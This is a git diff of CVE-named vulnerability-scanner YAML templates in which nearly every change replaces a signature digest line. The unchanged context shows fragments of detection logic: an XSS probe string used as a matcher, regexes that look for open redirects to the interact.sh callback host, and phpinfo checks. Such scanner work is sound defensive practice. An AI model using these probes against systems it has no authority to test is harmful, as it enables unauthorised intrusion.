490a0046304402204f16b40367a00bad645626cc5c96e034865a9445a1af1c640b019ebcb9c8a8f202205340ff14005e8c921717ef93f4fc144d61baedbdb28fd7fa60a1d6e47d3ecc53:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d6ae33e930e30137402aa6b59effb967d15c753f1a6b10c71b26d4ddeed4a1a1022100e81fda45f822c357163ed31130f7ca77149d4a658d038e413334f6e860cbce63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 85c33d555e..e64099f052 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -41,5 +41,4 @@ http: part: body words: - "4220397236" - -# digest: 490a0046304402202c5bd0db55655b42579f9dcbe6fa5ea8bcdb5ad6aa93182940331fad8cae25bc02206c7dd81915aa19ad2197a9e003cecf040c49976fb1752257b0207781f471e27f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c08e5470fd5aba01bfd41423c02069bcf5680d816c603aa402e45b2861cf91d6022100efa22fa19d98105b1fddac48ee2b841e75f8da63099981a5dfcd4c8d8ea5ac38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml index 09abe373ce..8301e7c4bc 100644 --- a/http/cves/2019/CVE-2019-7543.yaml +++ b/http/cves/2019/CVE-2019-7543.yaml @@ -46,5 +46,4 @@ http: part: header words: - text/html - -# digest: 4b0a00483046022100a9783ab0fbb7628ca1d7a092e8dabd565b6e8b7d3fd6403e9608c46f84e3f424022100b3e8a7c3363d98ffbcec92413fb8a33253797bb2ec707653df41b8518eec4f1d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dade0923a345c4a24391c283d5db98657f32ddf0e60a3e33550f79e60b3c92d8022100e52d20cd3905bb97f2e8a05ad2c55771969bc24c607ed8ece1f1c1de4308e2a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 57e0f523eb..8302d0288e 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022012399993fb17ba6ca6b665ca74bb741752acf5b3a98e0c075f54cbc23b3139210220508cc40539f293c288d10578009494e1e590cbae13ad8f5dce20aa25c5994a57:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bd753878ed6b53e9e280898ce630ff97155ef2bcd0e9d7dd0467648aaec4e870022036b7c813af25ee0304075ef26cba11d5397d6338079b99ecb3e36c612440536c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index aaa1e398bf..7f5fb13069 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009b0db108a6f66a681c0c94314dab2a2500e0cc2ebe2bfd817ab8ae697dab7af602206593553f4996129001acba5fa7364ef40f5d4b827d213a7b43a35cb572448da3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220704be72fe515bd03c6f6d52d228a4ed7594a27602438efb009448a9580e290d6022100aa834d3670851865f2bea061a08e5c7993443f76a1f475806ae388a188f43bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index e4d362f5bf..556281c64f 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -75,5 +75,4 @@ http: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body - -# digest: 4b0a00483046022100e9316a9eec4e8786df2f46b762490683b6b1080c37832c98737789e2aa023815022100b34f4756c8325a6baa3c695499aa2d061cb67ba224744ac2d5634740d4a5083a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a7cc5c080022f7c2895d65b9036e8b0e28946e05c1a443ebad7bd94219893f92022100ceabb69be18148001b912471272adaa015838091c5bebebb891b6311899f088a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index eba060dcd2..918ba1b42e 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a6e3b4c5b18b0794545ea51dcec4b8ce43be01daa7722ee24ceb26679d8bce1402201bf711929404aac0fd57321714584c28b1bd0c9dc8e31f407e0a0e3fc50addbb:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022057135e61f1efb35074272379efa95aee04163e9ee57ae6a42a0f4d3a5d60c4f5022003895857d923675654f7638db51b265cf9148f652262abe598dd3a047e0801e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index f0bb0fc4d4..bd4283866a 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c0ee61a862ff8da381fcbec56f46c402c943dfbb9f070a472a09bc9a08956ce20221008d358d273e5505d26893921311209b48599933b497cbc96444a93d50863a7fda:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fa39e87ac4abe1c2b6d1873faf9bfab4a72b185b5fb905cd353dce9364059e2a022100cc609b6fead4c75b764b8f263b9084b13382c5a3d7ae4f7a4752865b77a0a426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 7dc3c05e31..e903c5bd5e 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220251188bc43a71a3ef0f6eeabbf28f351ff459bac15772cd0f3f3f0a53ea8ee5f022100e694662d683c03cd6963ada3e282f6d6bb893007a46030059fffa3624c15c1be:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cae3208a06fab91f698320190727cc8321fadf24c66dac39fca7864876340b6c02206e7a3501c95759b64245cfc631c855907cff9aa87e0c445914079fc5c40f280f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index 50683e849b..17a19dc815 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b981bf3627c2c50df4ae3a9a410e5cf21242e00e09a42d0210dadfc276001fca022058d9aa2ffb470853fc14815affd82f2477dafd33a80ffa992a5e82c0641d37c9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100adaa1b175056561f4a2bffaa4fc4733c2b898b205aa6736eb4544d6681f2becb022100ec86a443db0f58041efd2fa0b50bf8a462dd194dcc68b5e0f7b3eab283f031c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 85d986c6a7..fbadcc967e 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fec669b15f68a544bc818c6cbc780623efa4f9ee942bde2c32b99eb2e0920f79022100e8ef61cf80b2b969e3ce363100700f1c112c5819263485632b81efb5a50aacd7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e5b929dd6684d8ad1194fa583fcabb9e2bcc5a30e78c75cff38e30733f20d9cb0220788b05ae4e28c9e0b143c860f37f56afca8f97857e9b73198b46b3f03fb582bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 00b01b0fbb..9177abf26e 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201bf7f0fca50492fbb9faa54051dd2d31a04866478a8d3a597746a0e721764e6802210099995503cb89ebdfaf17670144a8e2adad65f91992ed29f970380f94a44ad56a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206ccdabd8d161128deccef3b47dbd805fde42da611c99a69b7e998662c74594ea022100bf693c96d127122d69a0e3801ae5b85a124ee1d91f5634e1463028d2646f2665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml index 1ef6fda1bb..2aa05a6be6 100644 --- a/http/cves/2019/CVE-2019-9041.yaml +++ b/http/cves/2019/CVE-2019-9041.yaml @@ -45,5 +45,4 @@ http: - '!contains(body_1, "phpinfo")' - 'contains_all(body_2, "phpinfo","PHP Version")' condition: and - -# digest: 4b0a00483046022100a004d2ebe9bf6d6f82f73cd329cc1cf9fe72e11ccd563467ecdcd31940340a7b022100b068c58c3d7dc016010e3ac748f854a12215f2b426f5ae95423bf524cdcd2eaa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eff8837ec0e9bb0b6fa9321adebf44d3a6d4e0305a4d4c15b5c78e8dac14f1fc022100c426bd23b0f77a4ebe36b353ca1b9368f31963004b649ecb04bd219bd72b4f88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 935a0888cd..464c2952a3 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -43,5 +43,4 @@ http: status: - 200 - 500 - -# digest: 4a0a004730450220621137842befda47469c481aca26462fc9c166fa66f7c12968126855a8865581022100b1bd53a8eeae19df73e42016670a88e5efb8385c23cdcc5642de5578d3d2db1d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a2ce67182006ad116c73a76850aecbf04c59f30b563961bacb54936de02457c602206442aae8d0632b1eed7ab7ae2352eb98dddafbec598319390bef4fd03fba48aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index 3053fad1c0..e510b2baf3 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022057dc5e1e178b5e2eedf5b9393852ff498b7bec19aada94819e1f4ec8402aad10022067817972b0b79c5e4b73a141cf65e49ae6779fa03e5d4263afc8c4d01fb1f8b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022006c13701a6456ba4a2c324399c696a1aeeae5ca0bc694e0419be0eb3e0507dbd022100b8aa2295c71dd501e2eda11706aa9f75dfb01c4c70aead7b97343de4830bc2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 21e38ccff7..c519a1a1c4 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205fa372657fa3c46a43bc40924413d6f28b86f31a0c48c34188be68dcc4e154d202201dc81f4f9b5025ae78b72036a14328c01105a3f218c353e2572634164fc93dee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048afb681d68daafb8adb3c63b3933be46f850362f78ba1a9494051720c41fda1022100ebbc2f69a00453abe4eedbb436ce90821c6c741a13d717ed31e7966dd73f89c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 2a62b32c21..4c9763ea0e 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -41,5 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 - -# digest: 4b0a00483046022100f71a895881333ad0e4b03a77a2bb38d55fcda36a188bffcfcc5747c7c5c383a8022100d1ea84629e8d0062b1eee446c409823faa392745c2f4efc8ce280bec5f8e711b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210092d7f4f90a6a549df79cae8c64c840d5e4f3cae7624a6287ed0c803bbdc9abe9022100ca460ba8bcb357230a2b5e6304b31834b974a86a08e54c351e229ee6a95ed596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index 2b4e4e135b..adfcfae90f 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bbdb5db9481fcf13f3d92f1968942fea34c2e155e3ae397a85578fcbd0776bef0220580dfbe7f350c81bc9949709d109d03d090b1951800234b9b2fb786d4d551a0f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e2f663a6f0a991bcd31bdeea5481bbe57d082c58d4e3d75c739767190a4295ed02210093f5d25ba693561bbd5bf13b7591a855ed28bdb12220a8d6226b7b967e71d9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index add17b2ed4..594c732d0e 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -39,5 +39,4 @@ http: - "\";alert('1');//" - "Welcome" condition: and - -# digest: 4a0a00473045022042b71008b4794778be3738d2a08be742b6e387f2dc04eede4d4d480a70afa3f302210087fbbf535cf50066524e7c9c66936eb0a907e612c4a27192d90dfb7978a0cdcc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b53bbb6faf540ad1b93a3b9a8949576f857dd371c9dfe148c5e4d58a90c7968f022100ee558c806ac9f7256915249df9937b9928731abd855941b88e7904a4ad2daab5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index e405d53981..ea78ce1d90 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 400 - -# digest: 4a0a00473045022023ff4dbe452aa61f871fdd8e5d21f37982a3aec16f5176db540465258437127a022100c19bade3fcb7bf921686f1a90dc07f10a7e9c87cdaf0dcbe6b05301cf32bd0e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c32be3be5ddba11efe875e8356e3afbaa6a04ad0f85063badc8e764e34e6861b02203b6fd6ad4e1cda199386bfde239a3a981f60afd7f184fc15119ddc90765acee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index cd488f7068..4c6f673fdc 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f0d3f47b1c417fae991fc1abd47fc8b0d63b6106404d30f1ea0b660db8c317520221008291ecc33863994f7661ff88e9f48fdd76ec0a7ea278c8aaa48d6f4fdbedc5e8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f8ce00ec63240c1b9d2ec9f04b577f3cc7faa4ed6b667111921aafa3702d65b9022100ad7d7272093abafa0256a053ce5e62da41cb30d8ebf1e497254d60d75857c58c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index df8c94d35f..a86ab2896d 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220290c00c7ad89471e11279cbd10c211b0a20374b0db463a371feaf42d6db0a1eb0220456b46ce608789947ecacb6d7816a48c78885cddb61daac06f7c8745ec8a0099:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202c7fb8273fc7cbca6b6a8dc99d501d7f949b8897843baf86fc99838e3fab553a02201ad2fb349e966d67876c700a98e56e1e1c305bba25426dff805d41a9cd9667cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index c4d1a505fa..694a19b28f 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220796d791c2274bb97a5020a09f73beade1811ef56fd23f95c76a1edf8f9743342022024284f8a140a9359ae9330328dbe21ce7c80c874dd4c67f1d585767a476889dd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bb4b8a5d5856e8e9a4cbd4466ca99cf5c7100084662d7a067f124e726fb5911302210098e664a440ef3c6ecc2064e7487b8a27c5bfd8a02f7d80da1d462c8f5b3e1676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index f9e4a7f9bb..74e868395c 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b392c5d562ef8a39393a2991aa67a39308aace5b48fcc30ced3566a049ef7471022100ffd1ec3ff3bce1094acc1c6490db3b1677d118f578e8d0eec7472febba94e053:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ab530c6b0796ac7f642d6398a403f926ca4aef3e7d1ee14f98a342110f46d6080220581e712f2941ff17d7f01f4a1a9272a93df2a87a07250307d90f9f27cb23ba90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index cafcba925d..237f68644c 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fc9308690df7d952d311170d027cbca24cbea67e1280b156d24ddd76dfc5b175022100c7d83a8c3e91067cd4ccf622da5016b0e9e94fc805d454a8c55b26d8a8188c91:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205dd09aee2c55448167554eb86661f8102ff35e13b3785fb3bbc3d7859f0e0b2d022100844371f780b0103524b09adccef58612545eae8c6b41cb1c499536dc79d075ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index c9deea31fa..2a556bcef9 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -36,5 +36,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a0047304502206f162ada5f0449eb822b419e8c041e59972fe1e001296372cb5ad32015549a280221008d373e59b015e94dbb221c28e715c36cc49c340e1ee9b6edb20f74b985a96b2c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f936a49c1c060d8e5ba64147fac04b1f8d68807e84d13af7bd33674e869c07e102206ba02ae02a5324ba4cf5e118dffb0768a1900a77f6f075706915198430c1e112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index b4d7ba3c3b..34aac3bc04 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bcd05a0a7dd040ea591979fc3193b43a7514cfa3bfdd1bdbfc2f0f21864a15e4022100ddcf34177259c796722fe96175f11fb5420c49e3fc674ae7b7c1e0929a02ea8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206cc44419a625f356de7aea4f5c85920347c87e5dfde0cc42fa8a0190dd9d63c8022100f99081214f20a91bf662f8ee5e4a8978871685bee58200cd93056aa6b5d658c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 6bf052871f..46908fe381 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - -# digest: 4b0a00483046022100e239a0fda9fcc8169a6f85c9423723c35931b2e624faaf7d2146fc95c5fb7227022100cbc4869ea8fd12a09c1a1ffe43a4bef3567add5072ffc1319c040505f5cb52c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009a6e2a7c73088cbb18b35535a76cb5b8245f7103332ff331e0b7cb84533017550220559ec433ac259601a2146d32a08db86fa0134120f383b10a6a63817d71ebec5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index abb93b51bc..ead4cd082f 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -64,5 +64,4 @@ http: regex: - '"url":"([a-z:/0-9A-Z]+)"' part: body - -# digest: 4a0a0047304502203e58b974ac630739033df8f66beeb49471d1cf618271a3e2bf70ccd0bb029192022100ae5414efb7ce9a33e72c74b9de8cea53b7de808ea5b2a6c84f43465e393c495e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022077c6215a657982c31fea1d11761da102ea3746b604523fe4146d33f20939af5602204bc868342c559713df0915d457b3cdddcfee19d000e4fdeeb3eb4dacbfd3ea0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 2ba4e3e617..f57e493ca7 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206431b7bb4c0b0f73e66af3e1e7940fc7ee3c030fb06f240f4589f9afd8fc639c022023d19a0329615deb4fc5731cdae34c95932e7b1d925d7bce091a8cae954ac783:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022076ca55d158a82325ca9b731335b6cbce28127bf3b83ba3bb8e3a2b95a8528f09022009c21264d4dc0aa2c04cc13b2a2317ba3b41c29ba9e612a8e48a536efd9951ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index 60d86d5ae8..c924790fe8 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ae7239c2b50b95a1c37d95af9f2d250411cb605f52b2a7ba4ae96232e11ece1d02204828952b6cb339fb65e4400cac5ea4c157ad5646aa12d180dc2db66ac7fa2861:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca5add9681032b255f7272d46c5021674d300d8337d4be903434472a8cf06eaa022043a0323d21596953ae4c4c769cc724c7339b4bad289d1e0a154cd51ef992288b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 0355c6e1c6..47f9df6549 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100ae371950f0c6848b69ab38c03738b61f5eb09033dbf05ac2e197717bdef5ecbe02210086328a98f62063f231a3595e80c546e3b13a7249e5da3c7fe3502a419ec3511f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100da1190145279962a1b3499f5084ab4e1c5a3b8e2e894223f8ba85f3f80cfda660221009078e54e8f16494428d5aa46d773b553a6691edc1d89a8f961fda604ea01bc99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 11ca14fdf8..bd8a86bc5b 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "application/javascript")' - 'contains(body, "$(document).ready(function()")' condition: and - -# digest: 4a0a0047304502207aae5d5f5eb8b58607170a7d647effe77eba36993f0d2c8ae9c707799f6ad1c2022100f3cb25c6e212930e926a562116463a66f3417651d143fd45228e882fb22cd790:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022003dade144efb32db099d2bb0a1bb61ac66b482b69dfa1f28f6ae7144df88378602207e3ac465195469705d7aa044d1cec6cd26129b0db81c506555e50b0cea8256ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index bdc2faf218..3ab6a455cd 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008bd76e4bcab8906b2b5bb92c9681df64e38b3d2437b6fdecf6124d9e9e96b86d022075e018e67dd63594969cfb87522455f0c738a7bd1db0e80571f963fef986ddf9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e16fb01c3cf427b6f30bec2dfe9697eb907b8cb648b4373828d764192c0d15e3022100f1d39fc7e3cbd21c1f686e1f16f33eb8e2a26c0c392043d9e4272d1f95dc8f43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 97f1d68e4d..bf1c8fe45d 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022064477a8e8dc60069b81d52cfb041230e7576d45a8e88eb524753c6b6ced0797302207d36ccc98ce2536740ef38f9cc3d507b820e7fbc5dd9889c2890af8487d24bc4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f02665d31af9c0f99403b5295747b174753519638c616e8395686ce0bff366e402205deed29a0892e88fc178945b115fd547159715b3942c55d137264ee0ea00177c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 3fdcf0b967..7a7b7246ae 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100dcebdc1573a9fe30ab949daef319917638c643ce3c15304e28a884806893de330220769bba3034e688956bc164dca65e667372d0daa5549680c03b6de05210af0b13:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206be7e295d7f034e59a84d3c94a5b775e65d35a933e7225d15617d77ea5e86a8202210093ab860c879bb8f895d0de40a19d1bd2cf49c940b8ce1c4cfc80794737036f48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 5c6ff96e0e..0b2fb93a0b 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210087c78c970ade38de3aa263d131e894141cb84b3c8bcb3d78dcf712e9ccaa209c02201abfabbec26969218caa73df34846e18083637faef39bc5bb75ed4b98edbef93:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220259b456d8c1f3a42042dee4d74d72c8e73e0163fcc0357881571717751874672022100efcdeca9b503e4b3ad7d643f865e9e06f40e530f173c25d01dc95f7306d646d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 